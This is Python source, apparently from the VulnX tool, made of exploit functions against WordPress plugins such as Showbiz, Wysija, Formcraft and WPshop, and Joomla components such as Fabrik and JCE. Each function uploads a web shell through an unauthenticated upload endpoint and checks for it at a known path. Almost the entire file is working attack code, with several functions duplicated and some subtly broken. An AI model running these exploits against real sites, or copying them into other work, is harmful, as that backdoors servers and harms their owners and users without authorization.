def wp_showbiz(url, headers, timeout, vulnresults): endpoint = url + "/wp-admin/admin-ajax.php" #method to randomize the user agent [functionINfunction] def random_UserAgent(): useragents_rotate = [ "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" ] useragents_random = random.choice(useragents_rotate) return useragents_random useragent = random_UserAgent() headers['User-Agent'] = useragent headers['Content_Type'] = 'multipart/form-data' options = { "action": "showbiz_ajax_action", "client_action": "update_plugin", "update_file": [open('./shell/VulnX.php', 'rb')] } send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X" res = vxget(dump_data, options) check_showbiz = re.findall("Vuln X", res) if check_showbiz: print(' %s Showbiz Pro %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data) else: print(' %s Showbiz Pro %s' % (que, failexploit)) vulnresults.add('[FAILED] Showbiz Pro')
def joomla_foxcontact(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php', # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php', # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php', # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" headers = {"content-type": ["form-data"]} fieldname = 'file' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Fox Contact %s %s' % (que, vulnexploit, path_shell)) else: print(' %s fox Contact %s' % (que, failexploit))
def wp_wysija(url, headers, timeout, vulnresults): theme = "my-theme" endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' headers['Content_Type'] = 'form-data' options = { 'theme': shell, 'overwriteexistingtheme': 'on', 'action': 'themeupload', 'submitter': 'Upload' } send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_wysija = re.findall("Vuln X", res) if check_wysija: print(' %s Wysija Newsletters %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data) else: print(' %s Wysija Newsletters %s' % (que, failexploit)) vulnresults.add('[FAILED] Wysija Newsletters')
def wp_wysija(url, headers): theme = "my-theme" endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' headers['Content_Type'] = 'form-data' options = { 'theme': shell, 'overwriteexistingtheme': 'on', 'action': 'themeupload', 'submitter': 'Upload' } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_wysija = re.findall("Vuln X", res) if check_wysija: print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' % (W, R, W, W, R, W))
def joomla_comjdownloads(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "index.php?option=com_jdownloads&Itemid=0&view=upload" headers = {"content-type": ["form-data"]} files = open('./shell/VulnX.zip', 'rb') shell = open('./shell/VulnX.gif', 'rb') data = { 'name': 'Tig', 'mail': '*****@*****.**', 'filetitle': 'Tig', 'catlist': '1', 'license': '0', 'language': '0', 'system': '0', 'file_upload': files, 'pic_upload': shell, 'description': '<p>zot</p>', 'senden': 'Send file', 'option': 'com_jdownloads', 'view': 'upload', 'send': '1', '24c22896d6fe6977b731543b3e44c22f': '1' } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/jdownloads/screenshots/VulnX.gif?Vuln=X" response = vxget(path_shell, headers, timeout) if re.findall(r'Vuln X', response): print(' %s Com Jdownloads %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Jdownloads %s' % (que, failexploit))
def wp_dm(url, headers, timeout, vulnresults): headers['Content_Type']: 'multipart/form-data' options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''} send_shell = vxpost(url, options, headers, timeout) dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" content = vxget(dump_data, headers, timeout) check_dm = re.findall("Vuln X", content) if check_dm: print(' %s Download Manager %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data) else: print(' %s Download Manager %s' % (que, failexploit)) vulnresults.add('[FAILED] Download Manager')
def wp_dm(url, headers): headers['Content_Type']: 'multipart/form-data' options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''} send_shell = vxpost(url, options, headers, 3) dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" content = vxget(dump_data, headers, 3) check_dm = re.findall("Vuln X", content) if check_dm: print('%s [%s+%s] Download Manager %s---- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Download Manager %s --- %s FAIL%s' % (W, R, W, W, R, W))
def wp_cherry(url, headers, timeout, vulnresults): headers['Content_Type']: 'multipart/form-data' options = {'file': open('./shell/VulnX.php', 'rb')} endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" response = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" content = vxget(dump_data, headers, timeout) check_cherry = re.findall("Vuln X", content) if check_cherry: print(' %s CherryFramework %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data) else: print(' %s CherryFramework %s' % (que, failexploit)) vulnresults.add('[FAILED] CherryFramework')
def wp_adblockblocker(url,headers,timeout,vulnresults): endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" shell = open('./shell/VulnX.php','rb') headers['Content_Type'] = 'multipart/form-data' options = { 'popimg':shell, } send_shell = vxpost(endpoint,options,headers,timeout) dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X" res=vxget(dump_data, headers,timeout) if re.findall("Vuln X", res): print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data) else: print (' %s adblockblocker %s' %(que , failexploit)) vulnresults.add('[FAILED] adblockblocker')
def wp_cherry(url, headers): headers['Content_Type']: 'multipart/form-data' options = {'file': open('./shell/VulnX.php', 'rb')} endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" response = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" content = vxget(dump_data, headers, 3) check_cherry = re.findall("Vuln X", content) if check_cherry: print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' % (B, W, dump_data, W)) else: print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_fromcraft(url, headers, timeout, vulnresults): shell = open('./shell/VulnX.php', 'rb') fields = "files[]" headers['Content_Type'] = 'multipart/form-data' options = {fields: shell} endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/" response = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X" check_fromcraft = re.findall("\"files", response) if check_fromcraft: print(' %s Formcraft %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Formcraft -- Shell:' + dump_data) else: print(' %s Formcraft %s' % (que, failexploit)) vulnresults.add('[FAILED] Formcraft')
def wp_fromcraft(url, headers): shell = open('./shell/VulnX.php', 'rb') fields = "files[]" headers['Content_Type'] = 'multipart/form-data' options = {fields: shell} endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/" response = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X" check_fromcraft = re.findall("\"files", response) if check_fromcraft: print('%s [%s+%s] Formcraft %s ---------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Formcraft %s ---------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_shop(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_shop = re.findall("Vuln X", res) if check_shop: print(' %s WPshop eCommerce %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data) else: print(' %s WPshop eCommerce %s' % (que, failexploit)) vulnresults.add('[FAILED] WPshop eCommerce')
def wp_inboundiomarketing(url,headers,timeout,vulnresults): endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" shell = open('./shell/VulnX.php','rb') headers['Content_Type'] = 'multipart/form-data' options = { 'file':shell, } send_shell = vxpost(endpoint,options,headers,timeout) dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" res=vxget(dump_data, headers,timeout) check_wysija = re.findall("Vuln X", res) if check_wysija: print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data) else: print (' %s InBoundio Marketing %s' %(que , failexploit)) vulnresults.add('[FAILED] InBoundio Marketing')
def wp_adsmanager(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" res = vxget(dump_data, headers, timeout) check_adsmanager = re.findall("{\"status\":\"success\"}", res) if check_adsmanager: print(' %s Simple Ads Manager %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data) else: print(' %s Simple Ads Manager %s' % (que, failexploit)) vulnresults.add('[FAILED] Simple Ads Manager')
def wp_adsmanager(url, headers): endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" res = vxget(dump_data, headers, 3) check_adsmanager = re.findall("{\"status\":\"success\"}", res) if check_adsmanager: print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_shop(url, headers): endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" shell = open('./shell/VulnX.php', 'rb') field = "wpshop_file" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_shop = re.findall("Vuln X", res) if check_shop: print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_adblockblocker(url, headers): endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" shell = open('./shell/VulnX.php', 'rb') headers['Content_Type'] = 'multipart/form-data' options = { 'popimg': shell, } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) if re.findall("Vuln X", res): print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def joomla_fabrik2_d(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" headers = {"content-type": ["form-data"]} fieldname = 'file' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Com Fabrik2 %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Fabrik2 %s' % (que, failexploit))
def wp_levoslideshow(url,headers,timeout,vulnresults): endpoint = url + "/wp-admin/admin.php?page=levoslideshow_manage" shell = open('./shell/VulnX.php','rb') headers['Content_Type'] = 'multipart/form-data' options = { 'album_img':shell, 'task' : 'lvo_add_new_album', 'album_name': '', 'album_desk': '', } send_shell = vxpost(endpoint,options,headers,timeout) check = re.findall("/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell) if check: dump_data = url + "/wp-content/uploads/levoslideshow/"+check.group(1)+"/big/VulnX.php?Vuln=X" print (' %s levoslideshow %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] levoslideshow -- Shell:' + dump_data) else: print (' %s levoslideshow %s' %(que , failexploit)) vulnresults.add('[FAILED] levoslideshow')
def wp_powerzoomer(url,headers,timeout,vulnresults): endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage" headers['Content_Type'] = 'multipart/form-data' options = { 'album_img':[open('./shell/VulnX.php','rb')], 'task':'pwz_add_new_album', 'album_name':'', 'album_desc':'' } response = vxpost(endpoint,options,headers,timeout) check_powerzoomer = re.findall("\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response) if check_powerzoomer: uploadfolder = check_powerzoomer.group(1) dump_data = url + "/wp-content/uploads/powerzoomer/"+uploadfolder+"/big/VulnX.php?Vuln=X" print (' %s Powerzoomer %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] Powerzoomer -- Shell:' + dump_data) else: print (' %s Powerzoomer %s' %(que , failexploit)) vulnresults.add('[FAILED] Powerzoomer')
def joomla_comedia(url, headers, timeout): headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" headers = {"content-type": ["form-data"]} fieldname = 'Filedata[]' shell = open('./shell/VulnX.txt', 'rb') data = { fieldname: shell, } content = vxpost(endpoint, data, headers, timeout) path_shell = endpoint + "/images/XAttacker.txt" response = vxget(path_shell, headers, timeout) if re.findall(r'Tig', response): print(' %s Com Media %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Media %s' % (que, failexploit))
def wp_synoptic(url, headers, timeout, vulnresults): endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" #shell directory shell = open('./shell/VulnX.php', 'rb') field = "qqfile" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, timeout) dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" res = vxget(dump_data, headers, timeout) check_synoptic = re.findall("Vuln X", res) if check_synoptic: print(' %s Synoptic %s %s' % (que, vulnexploit, dump_data)) vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data) else: print(' %s Synoptic %s' % (que, failexploit)) vulnresults.add('[FAILED] Synoptic')
def wp_catpro(url,headers,timeout,vulnresults): headers['Content_Type']:'multipart/form-data' options = { 'album_img':[open('./shell/VulnX.php','rb')], 'task':'cpr_add_new_album', 'album_name':'', 'album_desc':'' } endpoint = url + "/wp-admin/admin.php?page=catpro_manage" content = vxpost(endpoint,options,headers,timeout) check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) if check_catpro: uploadfolder = check_catpro.group(1) dump_data = url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X" print (' %s Catpro Plugin %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] Catpro -- Shell:' + dump_data) else: print (' %s Catpro Plugin %s' %(que , failexploit)) vulnresults.add('[FAILED] Catpro')
def wp_inboundiomarketing(url, headers): endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" shell = open('./shell/VulnX.php', 'rb') headers['Content_Type'] = 'multipart/form-data' options = { 'file': shell, } send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_wysija = re.findall("Vuln X", res) if check_wysija: print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_synoptic(url, headers): endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" #shell directory shell = open('./shell/VulnX.php', 'rb') field = "qqfile" headers['Content_Type'] = 'multipart/form-data' options = {field: shell} send_shell = vxpost(endpoint, options, headers, 3) dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" res = vxget(dump_data, headers, 3) check_synoptic = re.findall("Vuln X", res) if check_synoptic: print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' % (W, R, W, W, R, W))
def joomla_comjce(url, headers, timeout): ip = socket.gethostbyname(hostd(url)) headers[ 'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" data = { 'upload-dir': './../../', 'upload-overwrite': 0, 'Filedata': [open('./shell/VulnX.gif', 'rb')], 'action': 'Upload' } content = vxpost(endpoint, data, headers, timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((url, 80)) path_shell = url + "/VulnX.gif" res = requests.get(path_shell, headers) if re.findall(r'/image/gif/', res): print(' %s Com Jce %s %s' % (que, vulnexploit, path_shell)) else: print(' %s Com Jce %s' % (que, failexploit))
def wp_blaze(url,headers,timeout,vulnresults): headers['Content_Type']:'multipart/form-data' #options to send options = { 'album_img':[open('./shell/VulnX.php','rb')], 'task':'blaze_add_new_album', 'album_name':'', 'album_desc':'' } endpoint = url + "/wp-admin/admin.php?page=blaze_manage" #vxpost alias sendrequest method in common folder. content = vxpost(endpoint,options,headers,timeout) check_blaze = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) if check_blaze: uploadfolder = check_blaze.group(1) dump_data = url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X" print (' %s Blaze SlideShow %s %s' %(que,vulnexploit,dump_data)) vulnresults.add('[SUCCESS] SlideShow -- Shell:' + dump_data) else: print (' %s Blaze SlideShow %s' %(que , failexploit)) vulnresults.add('[FAILED] SlideShow')
def wp_catpro(url, headers): headers['Content_Type']: 'multipart/form-data' options = { 'album_img': [open('./shell/VulnX.php', 'rb')], 'task': 'cpr_add_new_album', 'album_name': '', 'album_desc': '' } endpoint = url + "/wp-admin/admin.php?page=catpro_manage" content = vxpost(endpoint, options, headers, 3) check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) if check_catpro: uploadfolder = check_catpro.group(1) dump_data = url + "/wp-content/uploads/catpro/" + uploadfolder + "/big/VulnX.php?Vuln=X" print('%s [%s+%s] Catpro Plugin%s ------------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Catpro Plugin%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
def wp_powerzoomer(url, headers): endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage" headers['Content_Type'] = 'multipart/form-data' options = { 'album_img': [open('./shell/VulnX.php', 'rb')], 'task': 'pwz_add_new_album', 'album_name': '', 'album_desc': '' } response = vxpost(endpoint, options, headers, 3) check_powerzoomer = re.findall( "\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response) if check_powerzoomer: uploadfolder = check_powerzoomer.group(1) dump_data = url + "/wp-content/uploads/powerzoomer/" + uploadfolder + "/big/VulnX.php?Vuln=X" print('%s [%s+%s] Powerzoomer %s ------- %s VULN%s' % (W, G, W, W, G, W)) print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, dump_data, W)) else: print('%s [%s-%s] Powerzoomer %s ------- %s FAIL%s' % (W, R, W, W, R, W))